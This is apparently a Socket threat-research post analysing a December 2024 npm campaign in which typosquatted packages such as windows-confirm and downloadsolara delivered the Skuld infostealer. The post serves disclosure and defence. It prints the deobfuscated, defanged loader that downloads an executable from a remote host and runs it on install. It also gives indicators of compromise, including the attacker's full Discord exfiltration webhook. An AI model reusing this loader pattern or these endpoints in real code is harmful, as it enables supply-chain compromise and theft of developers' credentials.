Skuld Infostealer Returns to npm with Fake Windows Utilities and Malicious Solara Development Packages

Socket’s threat research team identified a malware campaign infiltrating the npm ecosystem, deploying the Skuld infostealer just weeks after a similar attack targeted Roblox developers. The threat actor, identified as “k303903” on npm registry, disguised malicious packages — windows-confirm, windows-version-check, downloadsolara, and solara-config — as legitimate tools. Before their removal, these packages compromised hundreds of machines, demonstrating how even low-complexity attacks can rapidly gain traction.

The npm registry’s swift response helped limit the spread and impact of this malicious campaign. However, the persistent nature of such attacks and the reuse of open source malware like the Skuld infostealer highlight that this issue is far from disappearing. By studying these recent incidents, developers and organizations can strengthen their defenses, safeguard credentials, and adopt more vigilant development practices.

Skuld Infostealer Returns to Poison the npm Well#

This latest malicious campaign delivering the Skuld infostealer marks the second time in two months that this malware has targeted npm developers. It closely mirrors a previous attack reported by Socket on November 8, 2024, where Roblox developers were compromised via npm packages infected with Skuld and Blank Grabber malware. Further supporting this, Datadog Security Labs published research on November 22, 2024, that reinforced the scale and sophistication of the threat. In December 2024, the attack has resurfaced, where a threat actor used typosquatting and simple yet effective techniques to compromise development machines and exfiltrate sensitive data.

The return of the Skuld infostealer to npm highlights a recurring pattern: attackers gain a foothold, achieve brief success, and swiftly adapt by reintroducing the threat with new packaging and distribution strategies. The December 2024 campaign exhibits the same familiar hallmarks: obfuscation, typosquatting, deceptive tactics, reliance on commodity malware, and common deployment methods.

Screenshot showcasing Skuld’s ability to steal passwords, cookies, sensitive files, and browsing history from Chromium and Gecko-based browsers.

Malicious Code#

The following malicious code snippet, deobfuscated, defanged, and annotated with comments, offers insight into the threat actor’s methods.

const fs = require("fs-extra");
const path = require("path");
const fetch = require("node-fetch");
const { exec } = require("child_process");

const exeFilePath = path.join(__dirname, "download.exe");

// Downloads and writes the malicious binary to disk, then executes it.
async function downloadFile(url, dest) {
  const response = await fetch(url);
  if (!response.ok) {
    throw new Error("HTTP error! status: " + response.status);
  }
  const buffer = await response.buffer();
  await fs.writeFile(dest, buffer);
}

async function runExecutable() {
  try {
    
    // The URL is disguised to appear legitimate, using a Cloudflare-like domain.
    await downloadFile("hxxps://alternatives-suits-obtained-bowl.trycloudflare[.]com/page", exeFilePath);
    exec(exeFilePath, (error) => {
      if (error) {
        console.error("Error running the executable: " + error);
      }
    });
  } catch (err) {
    console.error("Download error: " + err);
  }
}

runExecutable();

The threat actor employed Obfuscator.io, a widely used open source tool, to obfuscate the package code and evade initial detection. The Skuld infostealer payload was hosted on URLs designed to appear legitimate, including a domain impersonating Cloudflare. Upon installation, the malicious package silently fetched and executed the malware under the filename download.exe (SHA256: 27b86c1a24a1c97952397943f7b7ef21ee6859145556fe1b197e89074672bd07).

Socket AI Scanner’s analysis, including contextual details about the malicious package.

Threat Actor’s Strategy#

The threat actor k303903 employed typosquatting by uploading npm packages that mimicked well-known productivity and web development libraries, including masquerading as Windows-related utilities and Solara — a Python framework for building interactive web applications. By publishing packages that appeared legitimate or closely related to these tools, the threat actor aimed to deceive developers into installing them without thoroughly inspecting the package code.

For data exfiltration, the threat actor used a Discord webhook (hxxps://discord[.]com/api/webhooks/1316651715591667752/GNxf9DlNvCZmJ27gRfOlHCEVgvOG-kYbj6d2h5zaX48DpP41elqDEdBvoK1y4F1gpbbw), enabling data transfers and establishing command and control (C2) operations. The use of widely available, open source tools and services kept operational costs low while maximizing the campaign’s reach. To further deceive developers, the threat actor used legitimate-looking commands and paths to fetch the executable payload from a seemingly trustworthy source and from a legitimate service replit.dev. Although trivial to set up, Discord webhooks are a very common method for data exfiltration, allowing threat actors to blend into legitimate developer communication channels and testing environments.

The threat actor posing their malicious package as a legitimate library to deceive users.

Impact Assessment#

The malicious packages were downloaded more than 600 times before they were removed. Although the npm registry responded quickly — taking down the initial test package aaaa89852889 within one day and the subsequent, above-mentioned packages within four to five days — the impact on affected users was significant. Credentials, tokens, and other sensitive data were likely stolen, jeopardizing both individual developers and organizational networks. Short-lived campaigns like this can have long-lasting consequences, as compromised credentials may be weaponized well after the malicious packages are removed.

This attack mirrors the November 2024 incident, highlighting a troubling pattern: threat actors are pivoting rapidly, reusing known malware strains, and refining their deception techniques. The continued use of the Skuld infostealer demonstrates how commodity malware can cause devastating damage when distributed through trusted supply chains.

Recommendations and Mitigations#

Securing your development environment requires a layered approach. While basic measures like verifying package authorship and relying on trusted repositories are important, using automation and specialized tools is essential to keep up with rapidly evolving threats. Deploying free and real-time supply chain security tools, such as Socket’s free GitHub app, CLI, and browser extension, can intercept malicious code early in the development lifecycle. These tools scan pull requests and installations to block harmful dependencies before they integrate into your environment.

Indicators of Compromise (IOCs):#

Malicious Packages:

• windows-confirm
• windows-version-check
• downloadsolara
• solara-config
• aaaa89852889

Malicious URLs:

• hxxps://alternatives-suits-obtained-bowl.trycloudflare[.]com/page
• hxxps://971cfdde-59b5-4929-b162-6118a1825652-00-2zv0j6z5p6zi4.riker.replit[.]dev/page
• hxxps://971cfdde-59b5-4929-b162-6118a1825652-00-2zv0j6z5p6zi4.riker.replit[.]dev/start

Discord Webhook:

• hxxps://discord[.]com/api/webhooks/1316651715591667752/GNxf9DlNvCZmJ27gRfOlHCEVgvOG-kYbj6d2h5zaX48DpP41elqDEdBvoK1y4F1gpbbw

SHA256 Hashes:

• 27b86c1a24a1c97952397943f7b7ef21ee6859145556fe1b197e89074672bd07

MITRE ATT@CK:

• T1195.002 – Supply Chain Compromise: Compromise Software Supply Chain
• T1059.007 – Command and Scripting Interpreter: JavaScript
• T1036.005 – Masquerading: Match Legitimate Name or Location
• T1027.013 – Obfuscated Files or Information: Encrypted/Encoded File
• T1546.016 – Event Triggered Execution: Installer Packages
• T1555.003 – Credentials from Password Stores: Credentials from Web Browsers
• T1552.001 – Unsecured Credentials: Credentials In Files
• T1567.004 – Exfiltration Over Web Service: Exfiltration Over Webhook